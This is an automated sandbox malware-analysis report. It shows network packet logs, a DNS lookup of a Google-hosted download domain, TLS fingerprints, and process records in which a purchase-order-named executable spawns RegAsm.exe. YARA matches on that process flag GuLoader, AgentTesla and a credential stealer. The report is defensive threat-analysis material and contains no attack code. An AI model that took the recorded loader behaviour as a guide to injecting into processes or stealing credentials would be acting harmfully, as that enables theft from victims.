Feb 23, 2021 13:55:41.289275885 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.289295912 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.292256117 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.292279959 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.292372942 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.295392036 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.295416117 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.295520067 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.298465967 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.298491001 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.298624039 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.298661947 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.301604033 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.301626921 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.301779985 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.304716110 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.304738998 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.304810047 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.304836035 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.310363054 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.310385942 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.311448097 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.311474085 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.311661959 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.313211918 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.313582897 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.313604116 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.313674927 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.315769911 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.315794945 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.316055059 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.317991018 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.318015099 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.318442106 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.320138931 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.320168018 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.320277929 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.320317984 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.322314978 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.322340012 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.322397947 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.322422981 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.324552059 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.324579000 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.324702024 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.326720953 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.326745987 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.326817036 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.326858044 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.328877926 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.328903913 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.330394030 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.331113100 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.331137896 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.331351995 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.333276987 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.333300114 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.333369970 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.333444118 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.335381031 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.335405111 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.335505009 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.337498903 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.337524891 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.337616920 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.337636948 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.339626074 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.339648962 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.339766026 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.341748953 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.341772079 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.341902971 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.341943026 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.343935966 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.343965054 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.344078064 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.344116926 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.346038103 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.346064091 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.346199036 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.346239090 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.348010063 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.348035097 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.348088026 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.348124027 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.349963903 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.349988937 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.350033998 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.350053072 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.351890087 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.351914883 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.352003098 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.353790998 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.353815079 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.353864908 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.353918076 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.355635881 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.355659962 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.355705023 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.355729103 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.357465982 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.357489109 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.357553959 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.359235048 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.359260082 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.359334946 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.361004114 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.361027002 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.361093998 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.361140013 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.362771988 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.362797022 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.362857103 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.364522934 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.364548922 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.364633083 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.366293907 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.366322041 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.366378069 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.366425991 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.367470980 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.367506981 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.368568897 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.368591070 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.368652105 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.368688107 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.369700909 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.369724989 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.369786978 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.369803905 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.370852947 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.370877028 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.371937990 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.371959925 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.372016907 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.372055054 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.373040915 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.373064041 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.373203993 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.374182940 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.374207973 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.374258995 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.374311924 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.375206947 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.375284910 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.375334978 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.375382900 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.376281977 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.376303911 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.376394033 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.377326965 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.377351046 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.378369093 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.378391981 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.378448963 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.378478050 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.379440069 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.379462957 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.380481958 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.380507946 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.380559921 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.380597115 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.381506920 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.381531000 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.381679058 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.382531881 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.382555008 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.382613897 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.382657051 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.383537054 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.383559942 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.383642912 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.384552956 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.384576082 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.384639978 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.384663105 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.385543108 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.385565996 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.385638952 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.386487961 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.386512995 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.387444019 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.387465954 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.387522936 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.388411999 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.388434887 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.388495922 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.389358997 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.389398098 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.390233994 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.390317917 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.390337944 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.390398026 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.391252041 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.391274929 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.391325951 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.391355991 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.392158985 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.392198086 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.392267942 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.393105984 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.393127918 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.393322945 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.394011021 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.394032001 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.394102097 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.394123077 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.394844055 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.394865990 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.394933939 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.395715952 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.395737886 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.396605968 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.396631002 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.396678925 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.396728992 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.397448063 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.397469997 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.397515059 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.397532940 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.398336887 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.398360014 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.398397923 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.398418903 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.399166107 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.399188995 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.400008917 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.400032043 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.400074005 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.400114059 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.400840998 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.400861979 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.400940895 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.400959015 CET	49721	443	192.168.2.5	142.250.186.33

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 13:54:47.978749037 CET	54302	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:54:48.027896881 CET	53	54302	8.8.8.8	192.168.2.5
Feb 23, 2021 13:54:48.129612923 CET	53784	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:54:48.179608107 CET	53	53784	8.8.8.8	192.168.2.5
Feb 23, 2021 13:54:48.200261116 CET	65307	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:54:48.251832962 CET	53	65307	8.8.8.8	192.168.2.5
Feb 23, 2021 13:54:48.282918930 CET	64344	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:54:48.311639071 CET	62060	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:54:48.340244055 CET	53	64344	8.8.8.8	192.168.2.5
Feb 23, 2021 13:54:48.358143091 CET	61805	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:54:48.363409042 CET	53	62060	8.8.8.8	192.168.2.5
Feb 23, 2021 13:54:48.415371895 CET	53	61805	8.8.8.8	192.168.2.5
Feb 23, 2021 13:54:49.301271915 CET	54795	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:54:49.351567030 CET	53	54795	8.8.8.8	192.168.2.5
Feb 23, 2021 13:54:50.899384022 CET	49557	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:54:50.948510885 CET	53	49557	8.8.8.8	192.168.2.5
Feb 23, 2021 13:54:51.020817995 CET	61733	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:54:51.081790924 CET	53	61733	8.8.8.8	192.168.2.5
Feb 23, 2021 13:54:52.346899986 CET	65447	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:54:52.398571968 CET	53	65447	8.8.8.8	192.168.2.5
Feb 23, 2021 13:54:53.901712894 CET	52441	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:54:53.950316906 CET	53	52441	8.8.8.8	192.168.2.5
Feb 23, 2021 13:54:54.932262897 CET	62176	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:54:54.980887890 CET	53	62176	8.8.8.8	192.168.2.5
Feb 23, 2021 13:54:56.290306091 CET	59596	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:54:56.344659090 CET	53	59596	8.8.8.8	192.168.2.5
Feb 23, 2021 13:54:58.102540016 CET	65296	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:54:58.154129982 CET	53	65296	8.8.8.8	192.168.2.5
Feb 23, 2021 13:54:59.536494017 CET	63183	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:54:59.587620020 CET	53	63183	8.8.8.8	192.168.2.5
Feb 23, 2021 13:55:01.207981110 CET	60151	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:55:01.259661913 CET	53	60151	8.8.8.8	192.168.2.5
Feb 23, 2021 13:55:02.427306890 CET	56969	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:55:02.479212046 CET	53	56969	8.8.8.8	192.168.2.5
Feb 23, 2021 13:55:18.612637043 CET	55161	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:55:18.678308964 CET	53	55161	8.8.8.8	192.168.2.5
Feb 23, 2021 13:55:39.823947906 CET	54757	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:55:39.892337084 CET	53	54757	8.8.8.8	192.168.2.5
Feb 23, 2021 13:55:40.713150024 CET	49992	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:55:40.779531956 CET	53	49992	8.8.8.8	192.168.2.5
Feb 23, 2021 13:55:43.009402037 CET	60075	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:55:43.058140039 CET	53	60075	8.8.8.8	192.168.2.5
Feb 23, 2021 13:55:43.082118034 CET	55016	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:55:43.132141113 CET	53	55016	8.8.8.8	192.168.2.5
Feb 23, 2021 13:55:43.466408014 CET	64345	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:55:43.515160084 CET	53	64345	8.8.8.8	192.168.2.5
Feb 23, 2021 13:55:55.655267000 CET	57128	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:55:55.714029074 CET	53	57128	8.8.8.8	192.168.2.5
Feb 23, 2021 13:56:27.064119101 CET	54791	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:56:27.115803957 CET	53	54791	8.8.8.8	192.168.2.5
Feb 23, 2021 13:56:43.267014980 CET	50463	53	192.168.2.5	8.8.8.8
Feb 23, 2021 13:56:43.335036039 CET	53	50463	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 13:55:40.713150024 CET	192.168.2.5	8.8.8.8	0xaff5	Standard query (0)	doc-14-58-docs.googleusercontent.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 23, 2021 13:55:40.779531956 CET	8.8.8.8	192.168.2.5	0xaff5	No error (0)	doc-14-58-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 13:55:40.779531956 CET	8.8.8.8	192.168.2.5	0xaff5	No error (0)	googlehosted.l.googleusercontent.com		142.250.186.33	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 23, 2021 13:55:40.891935110 CET	142.250.186.33	443	192.168.2.5	49721	CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Tue Jan 26 10:05:02 CET 2021 Thu Jun 15 02:00:42 CEST 2017	Tue Apr 20 11:05:01 CEST 2021 Wed Dec 15 01:00:42 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 13:55:40.891935110 CET	142.250.186.33	443	192.168.2.5	49721	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: PO112000891122110.exe PID: 5420 Parent PID: 5640

General

Start time:	13:54:54
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\PO112000891122110.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PO112000891122110.exe'
Imagebase:	0x400000
File size:	73728 bytes
MD5 hash:	FCC9D54E6B6142DA1459A6AF8CE507E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 6820 Parent PID: 5420

General

Start time:	13:55:30
Start date:	23/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\PO112000891122110.exe'
Imagebase:	0x4e0000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 6860 Parent PID: 5420

General

Start time:	13:55:30
Start date:	23/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\PO112000891122110.exe'
Imagebase:	0x490000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 6900 Parent PID: 5420

General

Start time:	13:55:31
Start date:	23/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PO112000891122110.exe'
Imagebase:	0xfc0000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.487587781.000000001DF31000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.487587781.000000001DF31000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6916 Parent PID: 6900

General

